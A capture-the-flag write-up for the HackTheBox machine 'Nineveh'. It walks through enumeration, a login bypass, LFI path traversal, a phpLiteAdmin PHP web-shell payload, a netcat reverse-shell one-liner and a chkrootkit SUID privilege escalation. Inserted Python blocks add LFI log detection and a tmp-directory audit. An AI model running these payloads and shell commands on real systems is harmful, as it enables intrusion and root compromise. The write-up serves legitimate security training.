Welcome to the Nineveh writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Nineveh
Tags: HTB, Medium, Linux, OSCP
Platform: Hackthebox
Difficulty: Medium
OS: Linux
Enumeration
Nmap
To get started, we run a quick scan for open ports.
# nmap -p- -T4 10.10.10.43
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-19 08:47 CET
Nmap scan report for 10.10.10.43
Host is up (0.094s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 91.62 seconds
Now that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 80,443 10.10.10.43
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-19 08:57 CET
Nmap scan report for 10.10.10.43
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 93.65 ms 10.10.14.1
2 93.64 ms 10.10.10.43
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.99 seconds
Gobuster
# gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://nineveh.htb/ -x php,html,txt,bak -t 200 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://nineveh.htb/
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt,bak
[+] Timeout: 10s
===============================================================
2021/03/19 09:11:49 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.bak (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/department (Status: 301)
/index.html (Status: 200)
/info.php (Status: 200)
/server-status (Status: 403)
===============================================================
2021/03/19 09:13:04 Finished
===============================================================
Well, we have found the info.php file, which executes phpinfo(), and the /department directory, which serves a login form. If we look at its source code, we can see a commented line that reveals two possible users, admin and amrois:
<!-- @admin! MySQL is been installed.. please fix the login page! ~amrois -->
Bypassing login form
As we can see, the form is vulnerable to user enumeration: entering the user admin reports an incorrect password. So we will try to bypass it by appending [] to the password input's name, from the browser inspector or Burp.
Once we have authenticated as admin, we can read a note that says the following.
· Have you fixed the login page yet! hardcoded username and password is really bad idea!
· check your serect folder to get in! figure it out! this is your challenge
· Improve the db interface.
~amrois
Exploitation
LFI
If we click on Notes in the top menu, we see that it requests manage.php?Notes=files/ninevehNotes.txt, which we can surely use for an LFI. To check this, we can add any letter to the end of the file name.
After several tests, I was able to verify that the parameter must keep files/ninevehNotes or the injection is filtered, so something like Notes=files/ninevehNotes.php/../../../../../../etc/passwd should work.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
And with notes=files/ninevehNotes.php/../../../info.php we can include, for example, the file info.php.
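The filter the writeup observed (the parameter must keep files/ninevehNotes) behaves like a substring allow-list, which is exactly what the .php/../ traversal defeats. As an added example, not code from the writeup or from the box, the following Python models that check next to a path-normalising one and then runs the normalising check over constructed access-log lines; the files directory name, the log format and the sample lines are assumptions.

```python
# Added example (not from the writeup): models the observed filter, shows a
# path-normalising replacement, and applies it to constructed Apache log lines.
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

NOTES_DIR = "files"  # directory manage.php is meant to serve notes from (assumed)


def naive_filter_accepts(notes):
    """Substring allow-list of the kind the observed behaviour implies: bypassable."""
    return "files/ninevehNotes" in notes


def resolve_under_notes_dir(notes):
    """Return the normalised relative path if it stays inside NOTES_DIR, else None."""
    if "\0" in notes:
        return None
    # normpath collapses `x.php/../` lexically, as the include does, before we check.
    norm = posixpath.normpath("/" + notes)
    if not norm.startswith("/" + NOTES_DIR + "/"):
        return None
    return norm[1:]


# Constructed Apache-style access log lines mirroring the writeup's requests.
SAMPLE_LOG = [
    '10.10.14.7 - - [19/Mar/2021:09:20:01 +0100] "GET /department/manage.php?notes=files/ninevehNotes.txt HTTP/1.1" 200 512',
    '10.10.14.7 - - [19/Mar/2021:09:21:13 +0100] "GET /department/manage.php?notes=files/ninevehNotes.php/../../../../../../etc/passwd HTTP/1.1" 200 2048',
    '10.10.14.7 - - [19/Mar/2021:09:25:40 +0100] "GET /department/manage.php?notes=files/ninevehNotes.php/../../../../../../var/tmp/a&cmd=id HTTP/1.1" 200 300',
]
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def flag_lfi_requests(log_lines):
    """Return (ip, reason, value) for manage.php requests whose notes parameter
    escapes NOTES_DIR, or that carry the extra cmd parameter used for the RCE."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/department/manage.php"):
            continue
        qs = parse_qs(url.query, keep_blank_values=True)
        for key, values in qs.items():
            if key.lower() == "notes":  # the writeup uses both Notes= and notes=
                hits += [(m["ip"], "notes escapes files/", v) for v in values
                         if resolve_under_notes_dir(v) is None]
        if "cmd" in qs:
            hits.append((m["ip"], "cmd parameter on manage.php", qs["cmd"][0]))
    return hits
```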
After many unsuccessful tests with the LFI, we will try to find the secret directory mentioned in the note. In addition to looking for it on port 80, we will also look on port 443, since it is a different web server, as we can see when accessing it.
# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://nineveh.htb/ -k -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://nineveh.htb/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/03/19 20:34:19 Starting gobuster
===============================================================
/db (Status: 301)
/server-status (Status: 403)
/secure_notes (Status: 301)
===============================================================
2021/03/19 20:42:04 Finished
===============================================================
Well, inside https://nineveh.htb/db/ we can find a phpLiteAdmin instance, and there is also the secure_notes path.
Inside the secure_notes directory I don't find anything interesting, but inside db we have an access form that only requires a password, so by brute force I managed to get the password password123 to access it.
Exploitation
As we can see in this link, phpLiteAdmin has an RCE vulnerability. Let's attack it!
The first step is to create a new database with a short name, so that we can reach it through the LFI in the last step.
Now, we need to create a new table with any name.
Inside it, we need to set up a column with any name, with type text and with the default value set to the payload <?php passthru($_REQUEST["cmd"]);?>.
Perfect: as we can see in the database structure, the database file is at /var/tmp/a. Time to use it with the LFI.
http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.php/../../../../../../var/tmp/a&cmd=id
And... we got RCE! Let's go for the shell!
We are going to use the following reverse shell, URL-encoded:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.7 8787 >/tmp/f
And now, with a terminal listening, we access the URL.
http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.php/../../../../../../var/tmp/a&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.14.7%208787%20%3E%2Ftmp%2Ff
# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.43] 52156
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
Post exploitation
Enumeration
Pspy
By running pspy64 we can see the chkrootkit script being run every minute by root. A quick internet search turns up a vulnerability in this script that can give us root directly.
2021/03/21 12:20:02 CMD: UID=0 PID=10687 | /bin/sh /usr/bin/chkrootkit
Privilege escalation
To escalate privileges, we are going to compile a small program that sets its uid to root (which only takes effect once the file is root-owned and SUID) and save the binary as /var/tmp/suid.
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setuid(0);          /* effective once the file is root-owned with the SUID bit */
    system("/bin/sh");  /* spawn a shell with the escalated uid */
    return 0;
}
Now we create the payload as /tmp/update with the following content and make it executable.
www-data@nineveh:/tmp$ echo '#!/bin/bash' > /tmp/update; echo "chown root:root /var/tmp/suid; chmod 4755 /var/tmp/suid" >> /tmp/update
www-data@nineveh:/tmp$ chmod +x /tmp/update
Now we just have to wait for chkrootkit to run and assign SUID permissions to our file.
www-data@nineveh:/var/tmp$ ls -la
total 48
drwxrwxrwt 5 root root 4096 Mar 21 12:52 .
drwxr-xr-x 14 root root 4096 Jul 2 2017 ..
-rwsr-xr-x 1 root root 16664 Mar 21 12:30 suid
www-data@nineveh:/var/tmp$ ./suid
# id
uid=0(root) gid=33(www-data) groups=33(www-data)
# cat /home/amrois/user.txt
CENSORED_FLAG
# cat /root/root.txt
CENSORED_FLAG
#
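As an added example from the defender's side (not part of the writeup), this Python audit looks for the two artefacts the chkrootkit escalation above relies on: a setuid binary in a shared tmp directory and an executable named update in /tmp. The directory list, the function names and the messages are my own choices.

```python
# Added example (not from the writeup): audit shared tmp directories for the
# artefacts left by the chkrootkit /tmp/update escalation described above.
import os
import stat
from pathlib import Path

TMP_DIRS = ["/tmp", "/var/tmp"]  # the directories used in the writeup


def classify(path, st_mode, st_uid):
    """Return the reasons a regular file with this stat data is suspicious, if any."""
    reasons = []
    if not stat.S_ISREG(st_mode):
        return reasons  # directories, sockets, symlinks are out of scope here
    mode = stat.S_IMODE(st_mode)
    if mode & stat.S_ISUID:
        owner = "root" if st_uid == 0 else f"uid {st_uid}"
        reasons.append(f"setuid executable owned by {owner} (mode {mode:04o})")
    if os.path.basename(path) == "update" and mode & 0o111:
        reasons.append("executable 'update' in tmp: run as root by vulnerable chkrootkit")
    return reasons


def audit_tmp_dirs(tmp_dirs=TMP_DIRS):
    """Walk the given directories (non-recursively) and return [(path, reason)]."""
    findings = []
    for d in tmp_dirs:
        try:
            entries = list(Path(d).iterdir())
        except OSError:  # missing directory or no permission: skip, don't crash
            continue
        for p in entries:
            try:
                st = p.lstat()  # lstat: a symlink to a setuid file is not itself setuid
            except OSError:
                continue
            for reason in classify(str(p), st.st_mode, st.st_uid):
                findings.append((str(p), reason))
    return findings


if __name__ == "__main__":
    for path, reason in audit_tmp_dirs():
        print(f"[!] {path}: {reason}")
```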